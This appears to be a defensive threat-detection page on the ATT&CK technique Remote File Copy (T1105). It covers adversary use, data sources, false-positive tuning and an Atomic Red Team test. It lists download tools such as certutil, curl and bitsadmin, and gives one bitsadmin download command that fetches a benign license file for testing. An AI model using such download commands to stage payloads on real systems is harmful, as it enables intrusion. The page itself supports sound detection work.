Remote File Copy
Remote File Copy is fundamentally similar to Windows Admin Shares, and so the popularity of the ETERNALBLUE exploit among adversaries probably plays a substantial role in its prominence.
Editors’ note: While the analysis and detection opportunities remain applicable, MITRE has depreciated this technique and this page has not been updated since 2020.
Why do adversaries use Remote File Copy?
Living-off-the-land techniques are popular because many of the tools that an adversary might need to conduct a successful attack are installed on machines by default. However, not all exploitation tools exist natively on all systems. Adversaries leverage the Remote File Copy technique to deploy binaries from a command and control (C2) server to a victim machine or between systems in a compromised environment. As these examples suggest, the technique falls under both the Command and Control and Lateral Movement tactics.
Like certain other techniques on this list, Remote File Copy is a technique of necessity. Adversaries often have to copy files between remote systems if they want to accomplish their objectives. As a result, we see many prominent malware families leveraging Remote File Copy. MITRE ATT&CK lists nearly 200 threat groups and malware samples, but some prominent examples include:
How do adversaries use Remote File Copy?
While there are many broad and specific adversarial use cases for it, much of the Remote File Copy activity we observe relates to server message block (SMB) scanning and Lateral Movement.
Some other behaviors that are commonly associated with Remote File Copy include:
- Downloading binaries over HTTP/HTTPS
- Downloading binaries using built-in operating system tools such as PowerShell, certutil.exe, wget/curl, and BITS/bitsadmin, among others
Threats may rely on download cradles that are not new but are less prevalent—such as a Python urllib download—to perform Remote File Copy.
Remote File Copy occurs in tandem with many other techniques, most frequently with Windows Admin Shares (T1077). BITS Jobs (T1197) is another technique that is conceptually similar and frequently occurs in tandem with Remote File Copy. Exfiltration Over Alternative Protocol (T1048) and Data Staged (T1074) are additional techniques that frequently show up with Remote File Copy, suggesting that the technique occasionally plays a role in exfiltration.
We also observe a high volume of detections where Remote File Copy occurs with Process Injection (T1055) and a smaller volume occurring with Disabling Security Tools (T1089), both likely due to TrickBot. Some other interesting associations include DLL Search Order Hijacking (T1038), Domain Trust Discovery (T1482), and Process Hollowing (T1093).
MITRE’s data sources
- File monitoring
- Packet capture
- Process use of network
- Netflow/Enclave netflow
- Network protocol analysis
- Process monitoring
In addition to those data sources listed by MITRE ATT&CK, security teams should consider collecting from the following log sources:
- Firewall logs
- Database logs
- Email logs
Netflow/Enclave netflow and network protocol analysis
Network protocol analysis and/or Netflow will have the best chance to detect remote file transfers because, by definition, a Remote File Copy will have to traverse the network.
Process monitoring serves as an excellent supplement to network-based monitoring. Since it’s host based, this data source isn’t as easily affected by the evasion techniques that adversaries often use to subvert network-based security technologies, such as encryption or the misuse of network protocols.
You’ll want to establish a baseline for expected network activity and then alert on unusual network usage based on the following:
- Destination-source objects
- Data volume
- Other network traffic characteristics
This has been particularly effective in detecting data exfiltration. As an example, Red Canary had detected more than 1,000 confirmed threats this year based on detection and analysis of an excessive number of SMB sessions.
In terms of process data, there are a number of operating system-level commands that are capable of—but unusual mechanisms for—file transfer. Some examples include the use of:
- Python web server and curl
- OpenSSL for encrypted file transfers
Examining telemetry for these unusual events can be an effective way to detect malicious Remote File Copies. That said, most adversaries will only resort to using these unusual mechanisms for file transfer if more typical ones—such as file transfer protocol (FTP and secure copy (SCP), for example—are not available.
In addition, any non-native applications that establish network connections should be viewed with suspicion. The nearly 200 threats that MITRE ATT&CK lists for this technique include numerous examples that may be detectable in this way.
Weeding out false positives
False positive rates for detecting malicious Remote File Copying will vary widely from one environment to the next. For example, a public FTP server might generate an excessive number of alerts for suspicious FTP connections, so analytics based on any data source will need to be tuned for the environment in which they’re deployed. In some environments, connections to network printers may skew the expected network connections for system processes such as Notepad.
The two data sources suggested above (network and process data) probably have the greatest capacity to generate false positives if you fail to tune them. In general, process data is easier to tune, since it tends to include more context (e.g., user context, frequency analysis, and process ancestry) that can be used to determine behavior and intent.
Start testing your defenses against Remote File Copy using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.
View Atomic tests for T1105: Remote File Copy. In most environments, these should be sufficient to generate a useful signal for defenders.
Run this test on a Windows system using Command Prompt:
C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
Useful telemetry will include:
Process command line
“/transfer qcxjb7”, and the presence of a URL
creation of “Atomic-license.txt”
to remote site: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
Review and repeat
Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:
- Were any of your actions detected?
- Were any of your actions blocked or prevented
- Were your actions visible in logs or other defensive telemetry?
Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.